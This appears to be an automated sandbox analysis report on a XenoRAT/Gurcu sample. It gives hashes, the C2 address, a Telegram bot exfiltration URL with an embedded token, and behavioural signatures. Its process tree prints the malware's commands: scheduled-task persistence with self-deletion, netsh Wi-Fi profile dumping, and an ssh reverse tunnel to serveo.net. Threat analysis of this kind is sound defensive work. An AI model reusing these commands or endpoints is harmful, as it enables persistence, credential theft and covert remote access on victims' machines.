Analysis
-
max time kernel
123s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
27-09-2024 21:26
Static task
static1
Behavioral task
behavioral1
Sample
1bafb4856a31ae27271fbd2ee1574a4f.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
1bafb4856a31ae27271fbd2ee1574a4f.exe
Resource
win10v2004-20240802-en
General
-
Target
1bafb4856a31ae27271fbd2ee1574a4f.exe
-
Size
9.1MB
-
MD5
1bafb4856a31ae27271fbd2ee1574a4f
-
SHA1
b8b3649d959524df2c4e8a94434fc0de90f95005
-
SHA256
91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
-
SHA512
e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25
-
SSDEEP
3072:YaHDgOV/hchoS9bFr/l2Z40o6MLKkZPDOxAWP0:YmM8/DS9bF7knxMFb7D
Malware Config
Extracted
xenorat
193.149.187.135
Xeno_rat_nd8912d
-
delay
5000
-
install_path
appdata
-
port
4444
-
startup_name
mswindow
Extracted
gurcu
https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389
Signatures
-
Detect XenoRat Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\manager.exe family_xenorat behavioral2/memory/400-27-0x00000000007B0000-0x00000000007C4000-memory.dmp family_xenorat -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.exe1bafb4856a31ae27271fbd2ee1574a4f.exemanager.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation 1bafb4856a31ae27271fbd2ee1574a4f.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation 1bafb4856a31ae27271fbd2ee1574a4f.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation manager.exe -
Executes dropped EXE 5 IoCs
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.exemanager.exemanager.exe1bafb4856a31ae27271fbd2ee1574a4f.exe1bafb4856a31ae27271fbd2ee1574a4f.exepid process 760 1bafb4856a31ae27271fbd2ee1574a4f.exe 400 manager.exe 2232 manager.exe 1040 1bafb4856a31ae27271fbd2ee1574a4f.exe 3404 1bafb4856a31ae27271fbd2ee1574a4f.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1bafb4856a31ae27271fbd2ee1574a4f.exe Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1bafb4856a31ae27271fbd2ee1574a4f.exe Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1bafb4856a31ae27271fbd2ee1574a4f.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
manager.exemanager.exeschtasks.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language manager.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language manager.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4840 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2136 schtasks.exe 3060 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.exepid process 760 1bafb4856a31ae27271fbd2ee1574a4f.exe 760 1bafb4856a31ae27271fbd2ee1574a4f.exe 760 1bafb4856a31ae27271fbd2ee1574a4f.exe 760 1bafb4856a31ae27271fbd2ee1574a4f.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.exe1bafb4856a31ae27271fbd2ee1574a4f.exe1bafb4856a31ae27271fbd2ee1574a4f.exe1bafb4856a31ae27271fbd2ee1574a4f.exedescription pid process Token: SeDebugPrivilege 3852 1bafb4856a31ae27271fbd2ee1574a4f.exe Token: SeDebugPrivilege 760 1bafb4856a31ae27271fbd2ee1574a4f.exe Token: SeDebugPrivilege 1040 1bafb4856a31ae27271fbd2ee1574a4f.exe Token: SeDebugPrivilege 3404 1bafb4856a31ae27271fbd2ee1574a4f.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.exepid process 760 1bafb4856a31ae27271fbd2ee1574a4f.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.execmd.exe1bafb4856a31ae27271fbd2ee1574a4f.execmd.execmd.exemanager.exemanager.exedescription pid process target process PID 3852 wrote to memory of 2936 3852 1bafb4856a31ae27271fbd2ee1574a4f.exe cmd.exe PID 3852 wrote to memory of 2936 3852 1bafb4856a31ae27271fbd2ee1574a4f.exe cmd.exe PID 2936 wrote to memory of 3688 2936 cmd.exe chcp.com PID 2936 wrote to memory of 3688 2936 cmd.exe chcp.com PID 2936 wrote to memory of 4840 2936 cmd.exe timeout.exe PID 2936 wrote to memory of 4840 2936 cmd.exe timeout.exe PID 2936 wrote to memory of 2136 2936 cmd.exe schtasks.exe PID 2936 wrote to memory of 2136 2936 cmd.exe schtasks.exe PID 2936 wrote to memory of 760 2936 cmd.exe 1bafb4856a31ae27271fbd2ee1574a4f.exe PID 2936 wrote to memory of 760 2936 cmd.exe 1bafb4856a31ae27271fbd2ee1574a4f.exe PID 760 wrote to memory of 1152 760 1bafb4856a31ae27271fbd2ee1574a4f.exe cmd.exe PID 760 wrote to memory of 1152 760 1bafb4856a31ae27271fbd2ee1574a4f.exe cmd.exe PID 1152 wrote to memory of 4452 1152 cmd.exe chcp.com PID 1152 wrote to memory of 4452 1152 cmd.exe chcp.com PID 1152 wrote to memory of 532 1152 cmd.exe netsh.exe PID 1152 wrote to memory of 532 1152 cmd.exe netsh.exe PID 1152 wrote to memory of 2012 1152 cmd.exe findstr.exe PID 1152 wrote to memory of 2012 1152 cmd.exe findstr.exe PID 760 wrote to memory of 3324 760 1bafb4856a31ae27271fbd2ee1574a4f.exe cmd.exe PID 760 wrote to memory of 3324 760 1bafb4856a31ae27271fbd2ee1574a4f.exe cmd.exe PID 3324 wrote to memory of 3912 3324 cmd.exe chcp.com PID 3324 wrote to memory of 3912 3324 cmd.exe chcp.com PID 3324 wrote to memory of 4472 3324 cmd.exe netsh.exe PID 3324 wrote to memory of 4472 3324 cmd.exe netsh.exe PID 3324 wrote to memory of 2964 3324 cmd.exe findstr.exe PID 3324 wrote to memory of 2964 3324 cmd.exe findstr.exe PID 760 wrote to memory of 5032 760 1bafb4856a31ae27271fbd2ee1574a4f.exe ssh.exe PID 760 wrote to memory of 5032 760 1bafb4856a31ae27271fbd2ee1574a4f.exe ssh.exe PID 760 wrote to memory of 400 760 1bafb4856a31ae27271fbd2ee1574a4f.exe manager.exe PID 760 wrote to memory of 400 760 1bafb4856a31ae27271fbd2ee1574a4f.exe manager.exe PID 760 wrote to memory of 400 760 1bafb4856a31ae27271fbd2ee1574a4f.exe manager.exe PID 400 wrote to memory of 2232 400 manager.exe manager.exe PID 400 wrote to memory of 2232 400 manager.exe manager.exe PID 400 wrote to memory of 2232 400 manager.exe manager.exe PID 2232 wrote to memory of 3060 2232 manager.exe schtasks.exe PID 2232 wrote to memory of 3060 2232 manager.exe schtasks.exe PID 2232 wrote to memory of 3060 2232 manager.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1bafb4856a31ae27271fbd2ee1574a4f.exe -
outlook_win_path 1 IoCs
Processes:
1bafb4856a31ae27271fbd2ee1574a4f.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1bafb4856a31ae27271fbd2ee1574a4f.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1bafb4856a31ae27271fbd2ee1574a4f.exe"C:\Users\Admin\AppData\Local\Temp\1bafb4856a31ae27271fbd2ee1574a4f.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "1bafb4856a31ae27271fbd2ee1574a4f" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1bafb4856a31ae27271fbd2ee1574a4f.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:3688
-
-
C:\Windows\system32\timeout.exetimeout /t 33⤵
- Delays execution with timeout.exe
PID:4840
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "1bafb4856a31ae27271fbd2ee1574a4f" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2136
-
-
C:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exe"C:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:760 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:4452
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:532
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:2012
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:3912
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4472
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:2964
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3464 serveo.net4⤵PID:5032
-
-
C:\Users\Admin\AppData\Roaming\manager.exe"C:\Users\Admin\AppData\Roaming\manager.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Users\Admin\AppData\Roaming\XenoManager\manager.exe"C:\Users\Admin\AppData\Roaming\XenoManager\manager.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5908.tmp" /F6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3060
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exeC:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
C:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exeC:\Users\Admin\AppData\Local\Starlabs\1bafb4856a31ae27271fbd2ee1574a4f.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3404
Network
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
9.1MB
MD51bafb4856a31ae27271fbd2ee1574a4f
SHA1b8b3649d959524df2c4e8a94434fc0de90f95005
SHA25691cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
SHA512e71e6ab8f548c379f49ae60e8a179ed13d41a9e9862707f15513af083f754a4585b1567491bc08ecbbd3fb700e307b8114600c9aed297932a34b5f0fe1cebe25
-
Filesize
1KB
MD5ff43295eab0b6d30700cf545b83b6a4f
SHA184dc1111c2387fe2a378ac40d5eb80755de8a833
SHA256ab95865908354ee888dd2ef3dd7b39edd6174fdbd1cb049fe7b3050830640908
SHA512cefb28d7e12adf06f9565df8a9c20b39f6ee9e180c168ab449d376aaa8828faa4a9276b8f1c06b6a8761a076a18dd665eb0cc28837e8c5fa617123f09f935302
-
Filesize
4B
MD551e6d6e679953c6311757004d8cbbba9
SHA1ea9dc5ff81bb2208f87693b33672f46366a66bed
SHA2560d3fa6dd8f23a9a7db9b1e3bcb8e32fe97f51c4f519bcca616ba2e7837efebc9
SHA512b7fa7b9dd539c2a85565d0499f82158a0974a9f9c14505ce0b5e148a4dba3a211fa59fc53d70ccd21900ba81e1b27a6a83c87c82b0587f81fcd8f7123ec22c7e
-
Filesize
51KB
MD5da118f70d089dabfab1b43b4cd87db65
SHA16d7def883519e1099aa18c6ac2e1357edc7ea685
SHA2567788f402faf2c2221307b0c90b7c97b2235d324abe07ec3965a6c21b33c0b70e
SHA5127a78bbe0eb437bfaba85ee2513d1ccfca65b70e2e33187197d5891ddee42be453d9cadd883b171304135ee0679220e6c88c854572e41378c7968318908eaad3e